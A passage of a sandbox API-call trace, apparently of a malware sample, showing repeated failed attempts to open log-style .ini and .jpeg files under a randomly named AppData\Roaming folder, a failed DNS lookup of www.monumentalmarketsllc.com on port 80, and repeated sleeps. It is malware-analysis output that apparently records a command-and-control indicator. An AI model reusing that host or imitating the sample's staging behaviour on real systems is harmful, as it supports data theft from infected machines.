"c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.727] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.727] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894cf40) returned 1 [0160.728] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.728] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.728] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.728] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d840) returned 1 [0160.728] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.728] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.728] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.728] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894cf40) returned 1 [0160.728] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.728] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.728] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.728] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e140) returned 1 [0160.728] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.728] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.728] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.728] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894ca30) returned 1 [0160.729] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.729] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.729] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.729] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e140) returned 1 [0160.729] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.729] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.729] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.729] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894cf40) returned 1 [0160.729] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.729] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.729] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0160.729] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e140) returned 1 [0160.752] socket (af=2, type=1, protocol=6) returned 0x2568 [0160.752] getaddrinfo (in: pNodeName="www.monumentalmarketsllc.com", pServiceName="80", pHints=0x87905d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8790608 | out: ppResult=0x8790608*=0x0) returned 11001 [0160.941] Sleep (dwMilliseconds=0x7d0) [0160.942] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.942] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.942] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0160.942] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a0b0) returned 1 [0160.942] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.943] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.943] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.943] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928fd0) returned 1 [0160.943] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.943] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.943] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.943] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a0b0) returned 1 [0160.943] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.943] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.943] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.943] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x89297b0) returned 1 [0160.943] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.943] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.943] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.943] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x89297b0) returned 1 [0160.943] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.943] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.944] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.944] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928fd0) returned 1 [0160.944] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.944] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.944] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.944] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929450) returned 1 [0160.944] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.944] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.944] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.944] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928fd0) returned 1 [0160.944] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.944] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.944] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.944] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a0b0) returned 1 [0160.944] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.944] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.944] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0160.944] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a260) returned 1 [0160.944] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.944] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0160.944] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0160.944] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929f00) returned 1 [0160.944] Sleep (dwMilliseconds=0x7d0) [0160.946] Sleep (dwMilliseconds=0x7d0) [0160.948] Sleep (dwMilliseconds=0x7d0) [0160.949] Sleep (dwMilliseconds=0x7d0) [0160.951] Sleep (dwMilliseconds=0x7d0) [0161.001] Sleep (dwMilliseconds=0x7d0) [0161.003] Sleep (dwMilliseconds=0x7d0) [0161.004] Sleep (dwMilliseconds=0x7d0) [0161.006] Sleep (dwMilliseconds=0x7d0) [0161.007] Sleep (dwMilliseconds=0x7d0) [0161.009] Sleep (dwMilliseconds=0x7d0) [0161.010] Sleep 